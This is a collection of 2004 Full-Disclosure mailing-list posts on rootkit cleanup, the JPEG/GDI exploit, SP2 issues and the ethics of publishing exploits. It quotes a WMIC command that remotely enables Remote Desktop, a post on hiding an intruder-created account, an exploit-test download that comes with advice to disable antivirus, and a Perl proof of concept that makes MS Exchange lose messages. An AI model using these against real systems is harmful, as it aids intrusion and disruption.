Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.
--__--__--

Billy,

1. Go directly to safe mode
2. Go to regedit and check the startup processes under computer and user, and research each unfamiliar one
3. Run the HijackThis program
4. Run Spybot
5. Upon startup use TCPView and process viewer from sysinternals.com to see connections

One person made mention of this once when I had this problem on a sales laptop:

If you have scripting enabled, it is possible that one of them is doing this in the background. Scripts can remain active after you have left the page that started them. Some PC programmers tend to use busy waits instead of calling a sleep() or hibernate() function. This tends to kill performance on multiuser systems.

Optical mice also don't work well with certain colored pads and such. Make sure you try a different surface. Also of course clean the area very well. A piece of hair can cause problems.

Just some quick thoughts

thank you
Randall M
[Full-Disclosure] Senior M$ member says stop using passwords completely!
http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx

thank you
Randall M
[Full-Disclosure] Your daily internet traffic report
Router location / index
router1.iust.ac.ir Iran (Tehran) 29

Which one of you is attacking Iran? http://www.internettrafficreport.com/asia.htm

thank you
Randall M
RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
I did. He said stop using passwords. I'm not flaming, I was passing on an article.

thank you
Randall M

|-Original Message-
|From: Aviv Raff [mailto:[EMAIL PROTECTED]
|Sent: Saturday, October 16, 2004 10:19 AM
|To: 'RandallM'; [EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!
|
|No...
|Senior Microsoft member says: use passPHRASES instead of passWORDS.
|
|You should read the article before you start flaming.
|
|-- Aviv.
|
|-Original Message-
|From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of RandallM
|Sent: Saturday, October 16, 2004 3:14 PM
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Senior M$ member says stop using passwords completely!
|
|http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
|
|thank you
|Randall M
[Full-Disclosure] (no subject)
Oh my Gawd! I think I've fallen in love! You will be hearing from me soon!

--__--__--
Message: 4
Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST)
From: Jay Jacobson [EMAIL PROTECTED]
To: Mr. Rufus Faloofus [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Nessus experience

SNIP

Of course, another good place for these questions would be the Nessus mailing list. You may also want to check out Edgeos' Nessus Knowledge Base, which documents every configuration option in Nessus: http://www.edgeos.com/nessuskb/.

--
.. Jay Jacobson
.. Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com
.. Network Security Auditing and
.. Vulnerability Assessment Managed Services
--__--__--

thank you
Randall M
RE: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs
GuidoZ Didn't mean to have you apologize, it did it's job. It showed That I was not vulnerable. I just found it interesting that my AV called it something that could not be found through search. thank you Randall M |-Original Message- |From: GuidoZ [mailto:[EMAIL PROTECTED] |Sent: Thursday, October 07, 2004 1:16 AM |To: RandallM |Cc: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] RE: Full-Disclosure digest, |Vol 1 #1955 - 19 msgs | |It might be detected as Trojan.Moo or any other variant of |the JPEG exploit. As I said, it attempts to exploit the |system to see if it's vulnerable, using an infected JPG. |The file I provided is simply a SFX with a batch file and |the infecte JPG (named exploit.bak). No attempt has been |made at all to mask what's inside. | |I figured those that would want to use it would either not |worry about the virus warnings, or not get them at all and |REALLY need the fix it helps provide. =) Email me at the |address provided in my original email (exploit _AT_ guidoz |_DOT_ com) and I'll provide a link to the batch files and |such so you may modify them as you wish. | |Sorry for any confusion with the AV. I should of warned |about that in the original email. (Others have written me |asking the same question.) I only provided it to possibly |help others who have lots of friends asking them for help to |patch their systems. This simply sees if they are |vulnerable, then leads them through the steps to patch the |system if they are. (You may have to tell them to ignore AV |warnings, or disable the AV scanner. Again, I urge you to |test this on a NON-PRODUCTION machine first. See what it |contains, read the batch files, see what it downloads, etc.) | |Please feel free to ask me any questions. Hope it helps someone else. | |-- |Peace. 
~G | | |On Wed, 6 Oct 2004 20:59:28 -0500, RandallM |[EMAIL PROTECTED] wrote: | | |--__--__-- | | | |Message: 14 | |Date: Wed, 6 Oct 2004 15:53:32 -0700 | |From: GuidoZ [EMAIL PROTECTED] | |Reply-To: GuidoZ [EMAIL PROTECTED] | |To: [EMAIL PROTECTED] | |Subject: [Full-Disclosure] Quick JPEG/GDI test fix |(timesaver) | | |Hello list, | |I wrote a very simple program/batch file | that tests for the JPEG |exploit, then if affected, provides | instructions on how to patch the |exploit. It has been |tested on my | own lil happy lab network, as well |as one network |where I'm a | sysadmin. (Tested on Windows XP Home |and Pro, SP1a and |SP2.) | | |It DOES test for the exploit by attempting to use an |infected JPG | |which downloads the instructions for fixing it, if |exploited. By | |viewing the strings in the JPG, you can see the file it |downloads | and |check it out for yourself. It's clean. =) Just |contains a batch | file |and a program to launch the batch file. (The file |that gets | |downloaded |is a simple SFX.) Links are below. It contains a | warning saying it's |about to try to exploit the system |and to save | data in open programs. | |(It also warns that Explorer may crash.) | |I wrote |this merely | to save myself time and allow friends/family to |test their own | systems, then patch them without having to call me for ||help. It's | not been tested in every environment and in every |scenario. | |If you find a problem, feel free to email me (exploit |_AT_ guidoz | |_DOT_ com) Obviously I'm not responsible if it's abused ||somehow, | or if |it breaks something, etc. Feel free to modify it |to suit your | own |needs, but use it at your own risk. | | | |Test can be downloaded from here: | |http://www.guidoz.com/exploit-test.exe | | | |Again, it's just an SFX archive with a batch file. Hopefully it | will |save someone else some time. I've used it to have | friends/family (and |a few clients) patch a total of |around 30 machines without problems.
| | | |-- | |Peace. ~G | | | | | |--__--__-- | | | |End of Full-Disclosure Digest | | | | Well, guess I'm safe. McAfee saw it as |Exploit-MntRedir.gen and said...NO! | I googled it and it found nothing though. Thought it would at least | lead me to McAfee. McAfee search said: | | We found no records matching the following criteria: | Virus name containing MntRedir.gen. | Please try narrowing your search by using fewer characters. | | What gives? | | thank you | Randall M | | ___ | Full-Disclosure - We believe in it. | Charter: http://lists.netsys.com/full-disclosure-charter.html | | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Symantec Security Report 1V
http://www.securityfocus.com/columnists/271 Very interesting and yet kinda scary! Symantec gave their view on the trend of internet attacks. I'd be very interested on the views from this list. There is one area that is starting to concern me at my place of employment and that is IMs. I delete them and the next day they're back. What I need is some POC to show the bosses concerning the vulnerabilities associated with them. Which I believe is a trend that will increase greatly. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] House approves spyware legislation
The U.S. House of Representatives voted late Tuesday to restrict some of the most deceptive forms of spyware. By a 399-1 vote, House members approved legislation prohibiting taking control of a computer, surreptitiously modifying a Web browser's home page, or disabling antivirus software without proper authorization. http://news.com.com/House+approves+spyware+legislation/2100-1028_3-5397822.html?tag=nefd.top thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] House approves spyware legislation
|On Wed, 6 Oct 2004 05:03:45 -0700, Gregory Gilliss |[EMAIL PROTECTED] wrote: | Great, Not that I'm any fan of spyware, but this is just |another law | against hacking. Think - what's the difference between this and | someone using XSS to take control of a computer? If you |r00t a box | and deface the home page, then you've broken this law. | | sigh Instead of fixing the problem (poor software |security) we pass | laws to punish the people who do the things that |illustrate the problem. | Basic philosophical differences, blah blah blah ... | | Worst of all, do you really think that the spyware rackets |will slow | down or cease because of this? Nope - they'll just migrate |out of the jurisdiction. | | -- Greg |End of Full-Disclosure Digest | I guess one has to decide if browser hijacking is not the taking of personal property. I for one do not find it amusing to open my browser and it has been redirected to a hijacked page as my new Homepage! If this law would allow me...the user to bring down hell upon these people then I'm all for it. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs
|--__--__-- | |Message: 14 |Date: Wed, 6 Oct 2004 15:53:32 -0700 |From: GuidoZ [EMAIL PROTECTED] |Reply-To: GuidoZ [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] Quick JPEG/GDI test fix (timesaver) | |Hello list, | |I wrote a very simple program/batch file that tests for the JPEG |exploit, then if affected, provides instructions on how to patch the |exploit. It has been tested on my own lil happy lab network, as well |as one network where I'm a sysadmin. (Tested on Windows XP Home |and Pro, SP1a and SP2.) | |It DOES test for the exploit by attempting to use an infected JPG |which downloads the instructions for fixing it, if exploited. By |viewing the strings in the JPG, you can see the file it downloads and |check it out for yourself. It's clean. =) Just contains a batch file |and a program to launch the batch file. (The file that gets |downloaded |is a simple SFX.) Links are below. It contains a warning saying it's |about to try to exploit the system and to save data in open programs. |(It also warns that Explorer may crash.) | |I wrote this merely to save myself time and allow friends/family to |test their own systems, then patch them without having to call me for |help. It's not been tested in every environment and in every |scenario. |If you find a problem, feel free to email me (exploit _AT_ guidoz |_DOT_ com) Obviously I'm not responsible if it's abused |somehow, or if |it breaks something, etc. Feel free to modify it to suit your own |needs, but use it at your own risk. | |Test can be downloaded from here: |http://www.guidoz.com/exploit-test.exe | |Again, it's just an SFX archive with a batch file. Hopefully it will |save someone else some time. I've used it to have friends/family (and |a few clients) patch a total of around 30 machines without problems. | |-- |Peace. ~G | | |--__--__-- | |End of Full-Disclosure Digest | Well, guess I'm safe. McAfee saw it as Exploit-MntRedir.gen and said...NO! 
I googled it and it found nothing though. Thought it would at least lead me to McAfee. McAfee search said: We found no records matching the following criteria: Virus name containing MntRedir.gen. Please try narrowing your search by using fewer characters. What gives? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE:[Full-Disclosure] XP Remote Desktop Remote Activation
Would access to command shell be accomplished via the recent ZoneID hole if such Administration password access is not available? Or perhaps even with the launching of the MS04-028 exploit? Of course any Terminal usage on home PCs is noticed because users are locked out. Now terminal servers are a different story but user intervention is still needed. thank you Randall M |--__--__-- | |Message: 3 |Date: Fri, 1 Oct 2004 23:50:45 -0500 |From: Fixer [EMAIL PROTECTED] |Reply-To: Fixer [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] XP Remote Desktop Remote Activation | |--=_Part_505_31077403.1096692645033 |Content-Type: text/plain; charset=US-ASCII |Content-Transfer-Encoding: 7bit |Content-Disposition: inline | |XP Remote Desktop Remote Activation | | |Information | |Windows XP Professional provides a service called Remote Desktop, |which allows a user to remotely control the desktop as if he or she |were in front of the system locally (ala VNC, pcAnywhere, etc.). | |By default, Remote Desktop is shipped with this service |turned off and |only the Administrator is allowed access to this service. It is |possible, however, to modify a series of registry keys that may allow |a malicious user who has already gained a command shell to activate |Remote Desktop and add a user they have created for |themselves as well |as to hide that user so that it will not show up as a user in the |Remote Desktop user list. The instructions for this are attached. |Additionally, I have listed a sample .reg file of the type that is |discussed in the instructions below. |_ | SNIP |--__--__-- | |Message: 6 |From: Dominick Baier [EMAIL PROTECTED] |To: 'Fixer' [EMAIL PROTECTED], |[EMAIL PROTECTED] |Subject: RE: [Full-Disclosure] XP Remote Desktop Remote Activation |Date: Sat, 2 Oct 2004 17:43:11 +0200 | |if you have an administrator password for the machine you |can just use WMIC |to turn remote desktop on. 
|
|wmic /NODE:Server /USER:administrator RDTOGGLE WHERE ServerName="Server" CALL SetAllowTSConnections 1
|
|End of Full-Disclosure Digest
|
___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: horse before cart...I take it back
Sorry for my stupidity and too quick response. After careful study I see it's the .DLL only. This exploit has me too excited! I am impressed though with how quick the response to this has been. I have heard of few incidents. My own ISP has finally implemented protection even from those files received from the list. Personally I know of a high school here in Missouri that had to shut down internet access due to this so they claim. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] WinXP Application Layer Gateway Service
Is there anything fishy about this service performing background FTP requests? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE:[Full-Disclosure] How to obtain hostname lists
Fab, One kewl way is to open a website like Nakedladies.com and log all the visiting IP's! Kewl huh! Do you need someone to write some code also? thank you Randall M |--__--__-- | |Message: 4 |Date: Tue, 28 Sep 2004 09:32:37 -0600 |From: fabio [EMAIL PROTECTED] |To: Full-Disclosure [EMAIL PROTECTED] |Subject: [Full-Disclosure] How to obtain hostname lists | |Hi. | |I would like to know what techniques can Intruders use to |obtain a list of hostnames and attack them with exploit code? |For example, a huge list like: |www.foo.com |www.bar.com | |And so on. Also, they can have a list with certain criteria |in common (os, httpdver) and do a more selective attack. I |want to know how they can obtain hostnames and create a |huge database for potential host victims? | |Thanks in advance. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Need layman terms for jpeg exploit
Would some kind soul explain the total workings of the exploit in layman terms? Things like how it is used, how the user is exploited, what's common about the jpeg code that must be used, etc., etc. thank you in advance Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
What exactly would one gain by creating a PoC on this exploit? How exactly does this compare to meaningful disclosures that were revealed because someone would not listen or ignored the warnings of their security vulnerability. I mean, this is nothing like a program goof that allows clear-text passwords or exposes files or the like. This exploit (if it can be called that) took a lot of thought to create it and exploit it. Correct me if I'm wrong but it does not fall into the category of exploit as defined by this list. This was truly a created exploit that would not be there otherwise. This took intelligent input. This is nothing more than a black-hat attack. It is not a meaningful revealing of poor security as I've seen defined on this list. |--__--__-- | |Message: 13 |From: i.t [EMAIL PROTECTED] |Organization: i.t consulting |To: [EMAIL PROTECTED] |Date: Sun, 26 Sep 2004 11:57:33 +0200 |Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn | | | On Saturday 25 September 2004 16:59, raza wrote: | I just compiled this and it works well.. | | ... | yes and it works very well. | I can see this one's gonna be fun... | We'll have a worm within days. | |for nearly all of my clients using win xp I've deinstalled |win messenger. |one urgently wanted it back for communicating in real-time; |and, of course, |it's much more fun seeing a live picture of the |counterpart(s) in the chat |window... | |even having installed sp2 and the newest patches plus AV I |can imagine a virus |spreading within those pictures throughout the whole msn and so on... |any other defense? |or is this too much paranoia? | |i.t | | |--__--__-- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [Full Disclosure] *HACKERS COSTING ENTERPRISES BILLIONS
A report issued by Symantec found that: The average time period between the disclosure of a vulnerability and its first exploit by hackers collapsed from several weeks in past reports to less than six days in the first half of 2004. 'In some cases, we saw global exploits in less than two days,' said Weafer. The current report finds that the vast majority of those vulnerabilities were moderately to highly severe and nearly 40% were associated with Web applications. This and some other findings from its Internet Security Threat Report. See Security Wire Perspectives, Vol. 6, No. 72, September 20, 2004 for this and other related material. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Vulnerability in IBM Windows XP: default hidden Administrator account allows local Administrator access
Gentlemen, I'm a little lost now on the intent of the original post. I believe it was intending to say that IBM computers arriving with XP installations have blank default Administrator passwords. I install about three fresh installs of XP and four pre-installs on HP laptops a week. The retail version always asks for a password for the local Administrator account and a user name. XP pre-installations require a user name and no mention of Admin account though it's there by default with no password. Both by default give the user local administrator rights. Once installed I have to go to the accounts area and supply the passwords. If I join these to the domain I must supply a password. I've done it this way for two years and nothing has changed. It seems then the IBM and HP bypass what fresh retail installations do, and that is allow the opportunity to supply a password for the local administrator. This would be then their problem. Retail version warns but allows blank passwords. This would be the XP problem. I take full responsibility for any mistakes above. It's late. I'm tired and doing so many it does become mind numbing. But I believe this is an accurate account of the installations. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] ZIP Attachment
Nick, have some coffee, it'll be ok! :) thank you Randall M + --__--__-- Message: 10 Date: Sun, 19 Sep 2004 21:39:03 +1200 From: Nick FitzGerald [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] ZIP Attachment To: [EMAIL PROTECTED] Reply-to: [EMAIL PROTECTED] Organization: Personal account GuidoZ wrote: I'm well aware that a filename usually isn't a very useful tool when blah, blah, blah... Your first post was a total waste of bandwidth, this one doubly so. Your two minutes at Google were not worth the list's time and resources, yet after having the blindingly obvious pointed out to you, you had to compound that by posting a wacky justaficashun of your originally pointless message. Regards, Nick FitzGerald ++= ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: [Vmyths.com ALERT] Hysteria predicted for 'JPEG and windows update
I'm curious if anyone else noticed that the patch to fix windows only takes you to the SP2 update. We don't want the SP2 update because we have not fully tested this against our office and accounting software. I tried on three different machines and each time the windows update for critical or custom only allowed me to get the SP2 update, nothing else. Did I read wrong? Did they not issue a patch? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] (Full-disclosure) SP2 and McAfee. Has the final release been resolved?
With the SP2 RC1 McAfee could not update DATs. Framework could not start. Had to set settings manually. Has this been fixed in the final version? The settings: To fix VirusScan 7.0
* Run dcomcnfg from the DOS prompt
* Select Component Services
* Select My Computer
* Open DCom config folder
* Click no on the pop up dialog if it appears.
* Select Framework Services
* Right click on properties and select Security tab.
* Change Launch to Use default.
* Click on Apply.
* Close the windows
* Run Update
thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] FullDisclosure: CWS removal tools
I haven't seen all the threads on this but there is a tool called CWShredder. It was created to combat CWS. Unfortunately, the author was a student and it seems no longer can support it. I just attempted to find it somewhere else because his links seem down. At work I use it all the time to clean the computers. Worked wonders. Guess I'll cherish my tool until it becomes obsolete. I found one link that still works but not sure if it updates anymore. http://www.aluriasoftware.com/tools/cwshredder.zip . Here are some other useful links http://www.safer-networking.org/minifiles.html thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure antisemtism, -Steer it a bit back on topic-
Maarten, all, I might add that security is a big part of this subject considering cyber-war being implemented from both sides. thank you Randall M |--__--__-- | |Message: 6 |From: Maarten [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] antisemtism, FD and bandwidth |- what I want out of it |Date: Thu, 22 Jul 2004 14:03:20 +0200 | |On Thursday 22 July 2004 13:07, Harlan Carvey wrote: | | Consider this...this is a public list and people will | knowingly post off-topic. Sometimes they'll even say, | hey, this is off topic. Now, what would happen if | you were sitting around having a couple of beers w/ | your buddies and a friend of yours walked up and just | started talking about something that had nothing | whatsoever to do with what you and your buds were | talking about? Would you be the one to do that to | your friends? How about a group of strangers? | |Except that in that social context you cannot really say there is no |moderation. Moderation will not be official, sure, but body |language, |awkward looks and maybe a wisecrack or two will most of the |time quickly shut |up that person. Or they will continue their conversation in |a smaller |circle, all things that are impossible or at least difficult |to do on a ML. |On a mailinglist you can continue off-list, but that is a one-to-one |conversation, not a fork like you can have in your bar scenario. |Also, if the guy won't stop jabbing, you can all start to |leave and continue |elsewhere. This doesn't happen on mailinglists, or at the |very least it is a |process that takes months to complete, instead of seconds. | |To steer a little bit back to on-topic, can we conclude that |all computer |systems in Israel and the surrounding Palestine territories |are insecure ? |Because, since all real security begins with _physical_ |security, one can |easily argue that all those systems are notoriously insecure. ;-) | |Maarten | |-- |Yes of course I'm sure it's the red cable. 
I |guarante[^%!/+)F#0c|'NO CARRIER | ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability
So are there any problems or complications for enterprises when applying this patch? thank you Randall M Message: 3 Date: Fri, 02 Jul 2004 12:36:03 -0400 From: William Warren [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [Full-Disclosure] MS kills ADODB.Stream in IE to fix vulnerability http://support.microsoft.com/default.aspx?kbid=870669 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Successful in blocking all known exploits
After a number of years, much thought, and long nights I have developed a systematic method to prevent and thwart exploits on my system! NEVER REBOOT! I have been up and running for 876 days straight and have had no problems to date! thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Apology: Was Multiple Scanning Engines
I do sincerely apologize for offending those who felt this was not the place to ask such a question. I felt though that there was no better place than a place where the recipients were of high caliber and knowledge. A Google search would have only given me advertisements of We're the best type. For those who through kindness answered I thank you so much. --__--__-- Message: 4 Date: Sun, 27 Jun 2004 11:29:38 +1200 From: Nick FitzGerald [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] multiple scanning engines To: [EMAIL PROTECTED] Reply-to: [EMAIL PROTECTED] Organization: Personal account RandallM [EMAIL PROTECTED] wrote: I'm looking for something that can utilize multiple scanning engines to place above our mail servers. Any suggestions? Precisely how is this a security vulnerability disclosure issue? Securityfocus has a focus-virus list and there are many other fora around the web for discussing whose antivirus is best type issues... Please, no-one else reply to this _on list_. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 --__--__-- thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] multiple scanning engines
Hi, I'm looking for something that can utilize multiple scanning engines to place above our mail servers. Any suggestions? thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, SP2 Problems
Jelmer made this really neat statement: |--__--__-- | |Message: 5 |Date: Mon, 07 Jun 2004 04:17:28 +0200 |From: Jelmer [EMAIL PROTECTED] |Subject: RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary |code | (An analysis of the 180 Solutions Trojan) |To: 'Chris Carlson' [EMAIL PROTECTED] |Cc: [EMAIL PROTECTED] | |I haven't installed SP2 yet since I heard a lot of complaints from people |who claimed it caused instability, it had memory management issues, some |drivers didn't work, security measures a bit too much in your face etc | |But I reviewed the list of changes sometime back and I concur, it looks |very |promising, I think in the near future an IE exploit will be a rare |occurrence as opposed to a bi-weekly event | |End of Full-Disclosure Digest My reply: I have the sp2 after attending the Security Summit 2004. I loaded this on my test laptop. Glad I did. I would have been very pissed if I had loaded it on anything else. First off, if you have McAfee or Norton you no longer are able to update using auto. It for sure is for the home user. If you're expecting something that you can have a little more control over this is not for you. One thing that I was afraid of and concerned me due to my mobile users was the ability to use VPN. It works well and does give you options to select services for each connection you use. It did not recognize my virus program being loaded nor give me the option to point to it. I think that's due to the McAfee incompatibility in some way. I did look for a fix and found this but haven't tried it yet: __ The McAfee framework issue is solved easily.
Administrative Tools
Component Service
DCOM conf
Framework service
Right-click - properties
Set the launch and access permission to Default
Restart PC.
McAfee will update properly.
Seems to be an error in the McAfee installer. Then of course there seems to be a slew of areas from web programs to a warning from Microsoft that SP2 will break and disrupt existing applications unless specific code rewrites are made at the developer end. http://www.internetnews.com/ent-news/article.php/3322381 I'll test the above for McAfee fix and see if that works. Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] xabot or sdbot or spybot...
--__--__-- Message: 21 Date: Fri, 04 Jun 2004 00:08:23 +0200 From: Axel Pettinger [EMAIL PROTECTED] Organization: API To: Perrymon, Josh L. [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] anyone seen this worm/trojan before? Perrymon, Josh L. wrote: I found this worm/ trojan on a laptop. Ran FPort and found the .exe. Doesn't look like it propagates to other machines but rather communicates with a compromised web companies server using IRC. The compromised server has removed the IRC service. Only sends RST packets back. snip I would like to know the attack vectors. I'm guessing LSASS. AntiVirus scanners identify our trojan as: BitDefender : Backdoor.SDBot.Gen Kaspersky : Backdoor.Rbot.gen McAfee : W32/Sdbot.worm.gen.g Symantec: W32.Spybot.Worm Trend Micro : WORM_SPYBOT.AP From a quick look at the file I'd say the following is the best description of that trojan. There're several attack vectors ... http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SPYBOT.AP&VSect=T Regards, Axel Pettinger I'd like to throw something in here. While scanning with Spybot 1.3 it came to a halt with an error. The error was an Xabot error. After many attempts to figure this out I searched Xabot. This lead to Symantec's site http://securityresponse.symantec.com/avcenter/venc/data/w32.xabot.worm.html and http://www.sophos.com/virusinfo/analyses/w32sdbotna.html where it is associated with Sdbot. Well, for sure I am having a hell of a time finding it as all conventional means have failed. 3 online scans. 3 scans in safe mode. Hijack This, Swat-it, Bazooka and still Spybot is halted with the error. I uninstalled Spybot three times. It seems I have a remnant somewhere. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1675 - 32 msgs
Yo! Skylined, don't hold back, tell us how you really feel! |Message: 30 |From: Berend-Jan Wever [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: Re: [Full-Disclosure] lists, autoresponders, and netiquette |Date: Fri, 28 May 2004 03:42:40 +0200 | |Every time I post to a list I get these out of office auto-responses. |Can these responders be configured to not respond to stuff from a list? | |-Michael | |Yes, they can... and no, they won't. Too much shit-for-brains dumb-ass |good-for-nothing mofo's on the list for that. Why the hell do you think |every non-informative troll thread is replied to at least 30 times? |That's |just because there are more people subscribed that get a hard on from |annoying people (or are just plain stupid) than there are that get a hard |on |from actually contributing something. | |As a matter of fact I'm just replying because my girlfriend broke up with |me |and I'm drunk, else I wouldn't even bother: I just felt like being a |shit-for-brains dumb-ass good-for-nothing mofo. | |Cheer, |SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Remember the subject about posting the exploit?
Well, concerning the German Teenager who is responsible for releasing sasser, Mitnick states: He was no great technical expert. There was a published vulnerability and he took his worm and used his exploit code to be able to propagate it in the many systems that Sasser touched. http://www.zone-h.com/en/news/read/id=4245/ Just my point justified. A more protective measure must surely exist? Like I said before I play counter strike. The kids 12-18 years old on there know c+ like the back of their hand and brag about which university their bots got into that day and the number of bots they own. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure New therad: sasser, costs, support etc alltogether
QUESTION: If a tree falls in the woods where no one is around to hear it does it make a sound? If there wasn't someone looking for bugs or exploits would there be any? In a perfect world this list wouldn't exist. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Full-Disclosure MS Exchange message lost-so lets post how
I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then posts the exploit example because, in his own words, |I think some people know how to use this FEATURE ... I hope this post |will speed up the fix release! Exactly in what way do you think this should speed up the release? Granted, this is a lost email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of script kiddies who would never be able to find the exploit but are part of the group who know how to use this 'FEATURE'. They watch here and others just for that purpose. Where is accountability? I am torn between this issue of needed knowledge and exposed exploit. As a network administrator I have no need for the exploit but for the knowledge. I have found no better place than here for that. Then on the other hand you all give out the exploits for confirmation which is needed also. Just some of my personal inward ramblings. thank you Randall M |--__--__-- | |Message: 20 |Date: Wed, 12 May 2004 11:52:23 +0200 (MEST) |From: [EMAIL PROTECTED] |To: [EMAIL PROTECTED] |Subject: [Full-Disclosure] MS Exchange message lost | |* MS Exchange duplicate message fault (message lost) |* |* MS Exchange (all versions affected) duplicate message fault |* |* I discovered this bug independently on 10, 2003 |* |* public post 05, 2004 |* |* Helmut Schmitz [EMAIL PROTECTED] |* |* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */ | |MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send |messages with long message ids (189 bytes?) to more than one recipient |(cc), |the message will not be delivered correctly ... there is no correct logging |!!, |the messages will be delivered to only one recipient ... the message to |the |other will be lost !! | |I have sent this issue to Microsoft (10.2003) ... 
some months later |(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with |some reg settings fixes (workaround ;-) the problem. | |Perl Example (test exploit) ... | |#!/usr/bin/perl -w |use Net::SMTP; |$from = '[EMAIL PROTECTED]'; |$to = '[EMAIL PROTECTED]'; |$cc = '[EMAIL PROTECTED]'; |$subject = 'Test Email'; |$smtp = Net::SMTP-new('yourmailserver'); |$smtp-mail($from); |$smtp-to($to); |$smtp-cc($cc); |$smtp-data(); |$smtp-datasend(To: $to\n); |$smtp-datasend(Cc: $cc\n); |$smtp-datasend(From: $from\n); |$smtp-datasend(Subject: $subject\n); |$smtp-datasend(Message-ID: |veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte |ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng |eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei |feejktmhedgedherngrondljzhng \n); |$smtp-datasend(Hallo\n); |$smtp-datasend(123\n); |$smtp-datasend(123\n); |$smtp-datasend(123\n); |$smtp-dataend(); |$smtp-quit; | |Background: |Duplicate detection is decided by three factors. These are MessageID, |RootFID (the root folder ID of the mailbox) and the SubmitTime into the |store. These are used to build a unique key when the message is |submitted. |If all the factors are the same value, then we recognize the message as |duplicate. | |### | |I think some people know how to use this FEATURE ... I hope this post |will speed up the fix release! | 